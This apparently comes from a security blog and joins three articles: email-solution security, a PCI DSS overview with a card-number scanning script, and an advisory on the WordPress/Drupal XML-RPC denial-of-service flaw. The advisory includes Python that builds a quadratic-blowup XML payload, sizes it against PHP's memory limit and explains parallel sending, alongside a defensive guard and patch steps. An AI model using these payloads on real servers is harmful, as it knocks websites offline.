Security, Contractual agreements and Compliance:

Why you might need an email client

If you said today that you were planning to buy email software, most people would question the decision. There are umpteen free email and collaboration services to choose from, and a small business gets sufficient service and features from them while saving a lot of money. They are convenient, they remove the need for an in-house mail server, and they can give you an email address that carries your company’s name.

Security

With free email services providing almost everything you need, why would anyone buy one? It will cost far more, and there is the ongoing burden of keeping it patched and running. The answer is that businesses, and their requirements, differ. Some businesses need a higher grade of security for their email content: they cannot, at any cost, afford to have their email compromised, leaked or read by a third party. Such businesses need an email solution that contractually promises tight security. Note that the terms of service of free consumer services such as Gmail grant the provider a broad licence over content sent through the service and, at the time of writing, allow automated scanning of message content; the fine print does not claim ownership of your mail, but a security-sensitive business still cannot accept those terms. If your business cannot afford to have its email security compromised, it is worth investing in a dedicated email solution.

Contractual Obligations

Whenever you buy an email solution, read the fine print of the contract carefully. You are spending a lot of money and should not end up feeling fooled or cheated. Ensure that the contract clearly states that all your specific requirements will be met and that every feature you need is included, and that it does not cap or limit any service or feature. Pay particular attention to the clauses on who owns your data, where it is stored, who at the provider can access it, and how and when a breach will be reported to you. Anything unclear or ambiguous should be discussed beforehand, clarified, and amended if required.

Compliance

Every industry, however small, has its own guidelines and norms: set standards that everyone in that industry must meet and rules they must abide by. How you use email is affected by these rules too. When you pick your email solution you have to take the norms specific to your business into account and choose accordingly; you do not have a free hand there, and it is wise to go with the established standard. Choose your email solution carefully so that it complies with your industry’s standards.

Conclusion

There is no doubt that free email providers like Google, Yahoo! or Outlook.com are very popular; millions of people use them without any problem. But before you decide to use them for your business you need to make sure they will not create major concerns for you around security or compliance. If they would, there are any number of companies that will provide exactly the email solution your industry standard requires. Do not hesitate to pick the right one.

PCI Data Security Standards

We are all aware of online payments, the technology that has made paying and funding so easy, fast and, above all, secure that large transactions can be completed within seconds, no matter where you are. The most important aspect that has made this technology so popular is the SECURITY it provides to every individual transaction, and that security is governed by the PCI DSS.

The Payment Card Industry Data Security Standard is a globally accepted set of policies and procedures intended to secure credit, debit and prepaid card transactions and protect cardholders against misuse of their personal information. It was created jointly by Visa, MasterCard, American Express, Discover and JCB, and is defined and maintained by the Payment Card Industry Security Standards Council to protect cardholder data and reduce card fraud arising from its exposure.

The PCI DSS originally began as 5 different programs:

  • Visa’s Cardholder Information Security Program
  • MasterCard’s Site Data Protection
  • American Express’ Data Security Operating Policy
  • Discover’s Information Security & Compliance
  • JCB’s Data Security Program

Version 1.0 of the PCI DSS, which aligned these individual programs, was released on 15 December 2004; the PCI Security Standards Council itself was formed in September 2006 to maintain the standard. Versions 1.1 (2006), 1.2 (2008), 1.2.1 (2009) and 2.0 (2010) followed. Version 3.0 was published in November 2013 and took effect on 1 January 2014.

The PCI DSS has six major objectives:

  • First, build and maintain a secure network in which transactions can be conducted. Firewalls must be configured to protect cardholder data, and they must be effective without causing gratuitous inconvenience to cardholders or vendors; wireless LANs, which are highly vulnerable to eavesdropping and attack, need particular attention. Vendor-supplied defaults for passwords and other security settings must be changed before a system is put into production.
  • Second, protect cardholder data wherever it is stored. Repositories holding cardholder data, and any personal data such as dates of birth, mothers’ maiden names or Social Security numbers kept alongside it, must be secured against intrusion, and sensitive authentication data must not be retained after authorization. When cardholder data is transmitted over open, public networks it must be encrypted with strong cryptography; this matters in every form of card transaction, but particularly in e-commerce conducted over the Internet.
  • Third, maintain a vulnerability management program. Systems must run regularly updated anti-virus and other anti-malware software; applications must be developed and maintained securely so that they do not expose cardholder data to theft or alteration; and security patches from software and operating system vendors must be installed promptly (critical patches within a month of release).
  • Fourth, implement strong access control. Access to cardholder data should be restricted to those with a business need to know, every person with computer access to the system must be assigned a unique identifier, and cardholder data must be protected physically as well as electronically, for example with document shredders, by avoiding unnecessary paper copies, and with locks on dumpsters to discourage criminals who would otherwise rummage through the trash.
  • Fifth, regularly monitor and test networks to ensure that all security measures and processes are in place, functioning properly and kept up to date: logs of access to network resources and cardholder data must be kept and reviewed, anti-malware definitions and signatures must be current, and vulnerability scans and penetration tests must be run regularly.
  • Sixth, maintain a formal information security policy that is defined, maintained and followed at all times and by all participating entities. Enforcement measures such as audits and penalties for non-compliance may be necessary.

These six control objectives group the twelve PCI DSS requirements that an organization must meet to be compliant.

All merchants are required to be compliant, but the PCI DSS program is especially relevant to Level 4 merchants, the most numerous group: merchants processing fewer than 20,000 Visa or MasterCard e-commerce transactions per year, and all other merchants processing up to 1 million Visa or MasterCard transactions per year. Cardholder data security matters greatly to merchants because their business depends on their reputation and integrity; keeping cardholder data secure lets them grow while keeping the trust of the cardholder. The standard also benefits device vendors and manufacturers.

The PCI Security Standards Council provides tools to help organizations validate their compliance, including the Self-Assessment Questionnaires (SAQs), and runs the following programs.

For device vendors and manufacturers, the Council provides the PIN Transaction Security (PTS) requirements, a single set of requirements for all personal identification number (PIN) terminals, including POS devices, encrypting PIN pads and unattended payment terminals. To help software vendors and others develop secure payment applications, the Council maintains the Payment Application Data Security Standard (PA-DSS) and a list of Validated Payment Applications. The Council also trains professional firms and individuals so that they can assist organizations with their compliance efforts, and publishes lists of Qualified Security Assessors (QSAs), Payment Application Qualified Security Assessors (PA-QSAs) and Approved Scanning Vendors (ASVs). Large firms seeking to educate their own staff can take advantage of the Internal Security Assessor (ISA) program.

But what is the need to comply with the PCI Security Standards?

  • Compliance with the PCI DSS means that your systems are secure and customers can trust you with their sensitive payment card information.
  • If you build that trust, customers feel secure enough to use your services again and to recommend them to others.
  • Compliance is an ongoing process, not a one-time event. It helps prevent security breaches and theft of payment card data not just today but in the future, since the PCI Council constantly monitors threats and improves the industry’s means of dealing with them through enhancements to the PCI Security Standards and the training of security professionals.
  • When you stay compliant, you become part of a united, global response to payment card data compromise.

There are many indirect benefits of PCI DSS compliance too:

  • The effort to comply with the PCI Security Standards leaves you better prepared to comply with other regulations such as HIPAA and SOX.
  • It gives you a basis for a corporate security strategy.

The PCI DSS applies wherever account data is stored, processed or transmitted. Account data consists of cardholder data and sensitive authentication data:

  • Cardholder data: the Primary Account Number (PAN), together with the cardholder name, expiration date and service code. The PAN is the deciding factor: if the PAN is not stored, processed or transmitted, PCI DSS does not apply. Where the PAN is present, the name, expiration date and service code must also be protected according to the PCI DSS requirements.
  • Sensitive authentication data: full track data from the magnetic stripe or chip, the card verification code (CAV2/CVC2/CVV2/CID) and PINs or PIN blocks. This data may be used during authorization but must never be stored afterwards, even in encrypted form.

The PCI DSS security requirements apply to all system components that are defined as any network component, server, or application that is included in or connected to the cardholder data environment. They also include any virtualized components such as virtual machines, virtual switches/routers, virtual appliances, virtual applications/desktops, and hypervisors. The cardholder data environment is comprised of people, processes and technology that store, process or transmit cardholder data or sensitive authentication data. Network components include but are not limited to firewalls, switches, routers, wireless access points, network appliances, and other security appliances. Server types include, but are not limited to the following: web, application, database, authentication, mail, proxy, network time protocol (NTP), and domain name server (DNS). Applications include all purchased and custom applications, including internal and external applications.

The first step of a PCI DSS assessment is to accurately determine the scope of the review. At least annually and prior to the annual assessment, the assessed entity should confirm the accuracy of their PCI DSS scope by identifying all locations and flows of cardholder data and ensuring they are included in the PCI DSS scope. To confirm the accuracy and appropriateness of PCI DSS scope, perform the following:

  • The assessed entity identifies and documents the existence of all cardholder data in their environment, to verify that no cardholder data exists outside of the currently defined cardholder data environment (CDE).
  • Once all locations of cardholder data are identified and documented, the entity uses the results to verify that PCI DSS scope is appropriate (for example, the results may be a diagram or an inventory of cardholder data locations).
  • The entity considers any cardholder data found to be in scope of the PCI DSS assessment and part of the CDE unless such data is deleted or migrated/consolidated into the currently defined CDE.
  • The entity retains documentation that shows how PCI DSS scope was confirmed and the results, for assessor review and/or for reference during the next annual PCI DSS scope confirmation activity. (Source: PCI Security Standards Council)
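The scoping steps above start with finding every place cardholder data lives, and the account-data definition makes the PAN the field that decides whether a system is in scope. The following is an added worked example in Python, not PCI SSC tooling or code from this page: it scans constructed log lines for PAN candidates, uses the Luhn check to drop digit runs that merely look like card numbers (timestamps, order and session ids), and masks what it finds to the first six and last four digits that requirement 3.3 permits for display. The sample log lines and the two test PANs are constructed for the example.

```python
import re

# Constructed sample log lines for the demonstration. The 16-digit card values are the
# widely published Visa and MasterCard *test* PANs, not real cards; the session id on
# the third line is 16 digits that deliberately fail the Luhn check.
SAMPLE_LOGS = [
    "2014-08-06 10:01:12 INFO order=1001 card=4111111111111111 amount=19.99",
    "2014-08-06 10:01:13 INFO order=1002 card=4111 1111 1111 1111 amount=5.00",
    "2014-08-06 10:02:44 DEBUG session=1234567890123456 user=bob",
    "2014-08-06 10:03:01 INFO order=1003 card=5555555555554444 amount=42.00",
    "2014-08-06 10:04:19 INFO healthcheck ok",
]

# A PAN candidate: 13 to 19 digits, optionally separated by single spaces or dashes,
# and not embedded in a longer run of digits.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits):
    """Luhn check. Every PAN passes it, so it filters out most digit runs that only
    look like card numbers; it is a screening step, not proof of a card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                      # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Truncate for display as PCI DSS requirement 3.3 allows: at most the first six
    and last four digits remain visible."""
    return pan[:6] + "X" * (len(pan) - 10) + pan[-4:]


def find_pans(text):
    """Return the PANs (separators stripped) found in text that pass the Luhn check."""
    hits = []
    for m in PAN_CANDIDATE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):
            hits.append(digits)
    return hits


def scan_logs(lines):
    """Scope-confirmation pass over log lines: (line number, masked PAN) for every line
    holding cardholder data. A log that holds full PANs is itself part of the CDE."""
    return [(n, mask_pan(pan))
            for n, line in enumerate(lines, 1)
            for pan in find_pans(line)]


def redact(text):
    """Replace every Luhn-valid PAN in text with its masked form, so a log that must be
    retained can be taken back out of scope."""
    def repl(m):
        digits = re.sub(r"[ -]", "", m.group(0))
        return mask_pan(digits) if luhn_ok(digits) else m.group(0)
    return PAN_CANDIDATE.sub(repl, text)


if __name__ == "__main__":
    for line_no, masked in scan_logs(SAMPLE_LOGS):
        print(f"line {line_no}: cardholder data found ({masked})")
    print(redact(SAMPLE_LOGS[1]))
```

Run this over application logs, database dumps and file shares, not just the systems you already believe are in the CDE; anything it flags is in scope until the data is deleted or the flow is moved into the defined CDE. Redacting at the source, or never logging the PAN at all, is the cleaner fix than redacting afterwards.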

In conclusion: if you want your business to grow securely and win your customers’ trust and confidence, comply with the PCI DSS and close the openings for breaches, fraud and distrust.

WordPress/Drupal Vulnerability

If your website runs on the WordPress or Drupal CMS, update it now, or an attacker can take your site offline with a single well-crafted request. Why? Both are affected by a vulnerability in their XML-RPC processing, and together they run millions of websites. Let us know more.

Two of the most popular and widely used open-source content management systems, Drupal and WordPress, share a vulnerability that affects millions of websites. The two projects coordinated their security releases, for the first time, to get rid of the flaw.

The flaw was discovered by Nir Goldshlager, a Salesforce.com researcher. According to him, with a few keystrokes an entire Drupal or WordPress site can be taken down. It is a denial of service (DoS) issue in the XML processing behind the XML-RPC endpoints of both WordPress and Drupal. The flaw drew particular attention because US government websites, including WhiteHouse.gov, run Drupal. According to the WordPress release post, the issue lies in PHP’s XML processing, and the same update also protects against certain brute-force attacks and addresses a possible code execution vulnerability. The Drupal advisory says Drupal is affected because the PHP XML parser used by its publicly available XML-RPC endpoint is vulnerable to an XML entity expansion attack.
The flaw is an instance of a well-known attack, the XML Quadratic Blowup attack. The attack plays PHP’s memory limit off against Apache’s MaxClients and MySQL’s max_connections settings, as explained below.

But what is a denial of service (DoS) attack? It is an attempt to make a machine or resource unavailable to the users who need it. The motives vary, but when intentional the attack consists of efforts to interrupt or suspend the services of a host temporarily. A DoS attack comes from a single person or system, unlike a distributed DoS, which comes from many.

The affected versions are WordPress 3.5 to 3.9.1 and Drupal 6.x and 7.x (before 6.33 and 7.31). The Quadratic Blowup attack defines one large entity of tens of thousands of characters and then references it tens of thousands of times; an XML document of a few KB therefore expands, when parsed, to hundreds of MB or even GB. That load can bring a whole website or server down. How is the attack carried out? PHP (the language WordPress and Drupal are written in) limits memory to 128MB per process by default, so in theory a single XML bomb request cannot use more than 128MB. The problem is concurrency. Apache has its MaxClients property set to 256 by default, and MySQL, the database WordPress and Drupal use, has a default max_connections of 151, so roughly 151 requests can each be expanding an entity at the same time. Multiplying the per-request limit by the connection count (128MB × 151) gives 19328MB, more than enough to consume all available memory. To succeed the attacker must first fingerprint the memory limit on the target: a payload that expands past the PHP limit is killed by PHP with an out-of-memory fatal error and achieves nothing, whereas a payload sized just under the limit is fully expanded and holds that memory for the life of the request. Sending many such requests in parallel brings the system down.
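To make the arithmetic above concrete, here is an added example in Python; it is not code from the page, from Nir Goldshlager, or from either project, whose parsers and fixes are PHP. It builds a request of the quadratic-blowup shape, parses it with a naive parser (Python’s expat expands internal entities just as PHP’s XML parser did) to show the expansion, computes the sizing an attacker would do against PHP’s 128MB limit, and implements a pre-parse guard modelled on the Drupal mitigation of rejecting entity declarations and capping the tag count. The guard is an assumed approach, not Drupal’s code; the method name demo.sayHello and the entity name x are placeholders. The sizes are deliberately tiny so the demonstration runs in milliseconds on your own machine.

```python
import re
import xml.etree.ElementTree as ET

PHP_MEMORY_LIMIT = 128 * 1024 * 1024   # PHP's default memory_limit of 128M, in bytes


def quadratic_blowup_payload(entity_len, refs, method="demo.sayHello"):
    """Build an XML-RPC request in the shape the attack uses: one internal entity of
    entity_len characters, referenced refs times inside a single parameter. On the wire
    the document is roughly entity_len + 3*refs bytes; once the parser expands the
    references it holds entity_len * refs characters of text. The method name is a
    placeholder and does not matter to the parser."""
    entity = "A" * entity_len
    body = "&x;" * refs
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE methodCall [<!ENTITY x "' + entity + '">]>\n'
        '<methodCall><methodName>' + method + '</methodName>'
        '<params><param><value><string>' + body + '</string></value></param></params>'
        '</methodCall>'
    )


def expanded_size(payload):
    """Parse with a naive parser (expat expands internal entities, like PHP's parser)
    and return how many characters of text the single parameter expanded to."""
    root = ET.fromstring(payload)
    return len(root.find("./params/param/value/string").text)


def refs_for_limit(entity_len, memory_limit=PHP_MEMORY_LIMIT):
    """Number of references an attacker would choose so the expansion stays just under
    the process memory limit: over it, PHP aborts the request with a fatal error and no
    memory stays pinned; under it, the whole expansion stays resident."""
    return memory_limit // entity_len


def aggregate_memory_mb(per_process_mb=128, concurrent_requests=151):
    """Memory an attacker can pin across the server: the per-process limit times the
    number of requests that can be in flight at once (bounded here by MySQL's default
    max_connections of 151, as in the article's arithmetic)."""
    return per_process_mb * concurrent_requests


def is_safe_xmlrpc(payload, max_tags=30000):
    """Pre-parse guard (assumed approach, not Drupal's code): an XML-RPC request never
    needs a DTD, so any DOCTYPE or ENTITY declaration is rejected outright, and the
    number of tags is capped at the same 30,000 that Drupal chose."""
    if re.search(r"<!(?:DOCTYPE|ENTITY)", payload, re.IGNORECASE):
        return False
    if len(re.findall(r"</?[A-Za-z]", payload)) > max_tags:
        return False
    return True


if __name__ == "__main__":
    bomb = quadratic_blowup_payload(entity_len=1000, refs=40)
    print("bytes on the wire:", len(bomb))                      # under 1500
    print("characters after expansion:", expanded_size(bomb))   # 40000
    print("refs to sit just under 128M with a 50 KB entity:", refs_for_limit(50_000))
    print("memory pinned across 151 requests (MB):", aggregate_memory_mb())
    print("guard accepts the bomb?", is_safe_xmlrpc(bomb))      # False
```

The 40:1 ratio here is the whole attack in miniature: the cost to the attacker grows linearly with the request size while the cost to the server grows with entity size times reference count. Rejecting the DOCTYPE before the parser ever sees it removes the amplification entirely, which is why the guard checks the raw bytes rather than the parsed document. Only ever send payloads like this at systems you own.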

The risks created due to these attacks are:

  • Service unavailable
  • 100% RAM and CPU Usage
  • Exhausted Apache and MySQL connection slots
  • Server breakdown

The fix is to update both CMSes to their latest versions. Drupal and WordPress have released updates that plug the flaw, but it is up to the owners of the affected sites to apply them, so users of both are advised to update immediately. Because WordPress 3.7 introduced automatic background updates for security releases, sites on 3.7 or later receive the patch automatically; older sites must be updated by hand.

WordPress users are strongly advised to upgrade their sites to WordPress 3.9.2, which fixes the possible DoS issue in PHP’s XML processing. Since the vulnerability is present in WordPress 3.5 to 3.9.1, several sites need to be updated manually in order to be protected: automatic updates for security releases were introduced in WordPress 3.7, leaving users of 3.5 and 3.6 especially exposed. WordPress 3.9.2 also contains further security fixes:

  • Fixes a possible but unlikely code execution when processing widgets (WordPress is not affected by default), discovered by Alex Concha of the WordPress security team.
  • Prevents information disclosure through XML entity attacks in the external GetID3 library, reported by Ivan Novikov of ONSec.
  • Adds protections against brute-force attacks against CSRF tokens, reported by David Tomaschik of the Google Security Team.
  • Contains some additional security hardening, like preventing cross-site scripting that could be triggered only by administrators.

Users can update to version 3.9.2 immediately from Dashboard > Updates in the WordPress admin. Sites that support automatic background updates will be updated within 12 hours. Sites on WordPress 3.8.3 or 3.7.3 will be updated to 3.8.4 or 3.7.4 respectively. Older branches are not supported, so update to 3.9.2, the latest release.

Drupal 7.31 and 6.33 are the security releases that fix this vulnerability. From the Drupal release notes:

  1. As of this release, the XML-RPC system in Drupal core will ignore information in <?xml> declarations contained within XML-RPC messages (for example, XML version or character encoding information). This is not expected to matter for the vast majority of use cases.
  2. The XML-RPC system and OpenID XRDS parser will also reject messages that contain over 30,000 XML tags within them. This limit is not expected to matter for the vast majority of use cases. If you need to process an XML-RPC message that is larger than that, you can change the limit by setting the “xmlrpc_message_maximum_tag_count” variable to a higher value. For example, in settings.php:

<?php
// Allow XML-RPC messages with up to 50,000 XML tags to be processed.
$conf['xmlrpc_message_maximum_tag_count'] = 50000;
?>

Do not set the value higher than you need, since allowing too many XML tags per XML-RPC message increases your site’s exposure to denial of service attacks. The OpenID XRDS parser has a similar variable (“openid_xrds_maximum_tag_count”) which can be used in the same way.

If you are unable to install the latest version of Drupal immediately, you can alternatively remove the xmlrpc.php file from the root of Drupal core (or add a rule to .htaccess to prevent access to xmlrpc.php) and disable the OpenID module. These steps are sufficient to mitigate the vulnerability in Drupal core if your site does not require the use of XML-RPC or OpenID functionality. However, this mitigation will not be effective if you are using a contributed module that exposes Drupal’s XML-RPC API at a different URL (for example, the Services module); updating Drupal core is therefore strongly recommended.

To conclude: update your Drupal and WordPress sites to the latest versions and keep them secure.